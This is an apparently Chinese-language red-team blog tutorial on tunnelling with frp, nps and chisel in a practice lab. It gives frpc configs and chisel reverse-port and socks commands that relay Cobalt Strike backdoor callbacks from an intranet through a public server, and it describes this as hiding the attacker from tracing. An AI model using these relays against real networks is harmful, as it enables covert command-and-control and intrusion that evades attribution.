隧道技术篇2&&frp代理&&nps代理&&shisel代理

发布于:2025-07-01 ⋅ 阅读:(30) ⋅ 点赞:(0)

FRP代理

1.实现湖北内网控制北京的内网C2上线 2.实现湖北内网探针北京内网 信息收集 (socks建立和端口映射)

1.连接47.98.210.85 7000端口服务端 2.尝试将服务端的6666转到127.0.0.1 5555采用tcp协议,备注名proxies

serverAddr="47.98.210.85"
serverPort=7000

[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666

如何利用这种情况实现c2上线 监听器1:47.98.210.85 6666端口 监听器2:192.168.139.141 5555端口 生成后门用监听器1 原理就是把内网中的192.168.139.141端口流量转发到47.98.210.85的6666端口上,我们就可以通过47.98.210.85的6666上线了

后门->47.98.210.85:6666->frp 192.168.139.141 5555->监听器2->正常上线

如下示例 下图中的47.98.210.85是公网服务器ip地址

如下的192.168.139.141是c2的ip地址

我们生成后门要使用公网ip的后门来生成,因为目标主机是内网,只可以访问到公网的ip地址47.98.210.85的6666

当我们的后门攻击内网机器,然后内网机器回去连接公网服务器,然后公网服务器存在ftps服务,kali客户端连接的时候会吧公网服务器的6666转换为本地的5555,然后cs监听本地的5555,所以就可以上线了

我们来通过实验说明一下 1.在本地kali上开启cs服务,然后客户端连接

2.在kali上运行frpc来配置如上,把远程服务端的6666端口转换为本地的5555端口

serverAddr="47.98.210.85"
serverPort=7000

[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666

本地kali配置

公网服务器配置

这里我本地一直配置不成功,最后我改了一下服务端的7000端口为7001,可能是端口冲突了

3.使用cs建立监听器 先建立一个反向链接公网服务器6666端口的监听器,让客户端连接公网服务器

然后建立一个监听器来监听本地的5555端口,因为frp把公网的6666代理到了本地的5555端口

然后创建一个后门,后门是使用第一个监听器,通过内网主机去连接公网服务器,然后公网服务器通过frp转发到本地

然后通过在目标内网执行后门,成功上线到了c2服务器

这个好处就是红队在朔源的时候,他找不到我,可以隐藏我自己的身份 通过frp来端口转发流量

内网穿透来访问内网 1.在目标内网的windows建立frp的客户端,然后frps建立在公网服务器中

frps配置如下

frpc配置如下

然后在本地配置proxychain代理去访问内网服务器

就是下图中的账号密码

最终我可以去访问和192.168.198.130,因为应该和这个192.168.198.130通往段的ip地址也可以访问,因为192.168.198.130这个ip可以上网,和47.105.65.102互通,其他的主机192.168.52.0/24这个网段访问不通,因为是用红日靶场做的实验,红日中器它机器和的网卡用的是仅主机模式没有网关,也就是没有路由,所以不通

端口映射和socks5代理方向不同,socks5是外部流量进入,而端口映射是本地流量映射出去,是我发送出去

NPS代理

nps是一款轻量级,高性能,功能强大的内网穿透代理服务器,目前支持udp,tcp流量转发,可支持任何tcp,udp上层协议访问内网网站本地支付接口,ssh访问,远程桌面,dns解析等,此外还支持内网http代理,外网socks5代理,p2p等,并带有功能强大的web管理端

1.下载nps,然后上传到服务端口,直接运行,然后访问服务端的ip地址加端口8080

通过默认账号admin和默认密码123登录

客户端连接之后,点击隧道

然后新增

填写如下,将服务器的6666转发到内网的5555端口,就是转发到执行刚才客户端命令的5555端口

然后和之前一样使用两个监听器,一个监听器是6666的公网服务器端口,一个是本地的5555端口,kali机做攻击机的的话就可以通过隧道建立连接了

socks代理 1.在nps中建立socks代理,如下配置

2.新增,然后选择socks代理

3.然后配置客户端,客户端在目标主机上面建立,也就是被攻击的内网主机 4.在kali机器上使用代理,然后访问内网,继续内网渗透

shisel代理

内网穿透c2上线

建立服务器监听1234
./chisel server -p 1234 --reverse
建立客户端连接服务端后将141主机的5555给到服务端6666上
./shisel client -v 47.98.210.85:1234 R:0.0.0.0:6666:192.168.139.141:5555
后门请求6666,然后kali运行./shisel client -v 47.98.210.85:1234 R:0.0.0.0:6666:192.168.139.141:5555去6666转发给自己的5555,然后自己通过5555进行cs上线

内网穿透信息收集

1.建立socks节点
建立服务器监听1090
chisel server -p 1090 --socks5
2.建立客户端连接服务端将使用socks服务
chisel client 47.98.210.85:1090 socks &
3.使用kali通过服务器ip地址和1090端口进行代理,信息收集

网站公告

今日签到

点亮在社区的每一天
去签到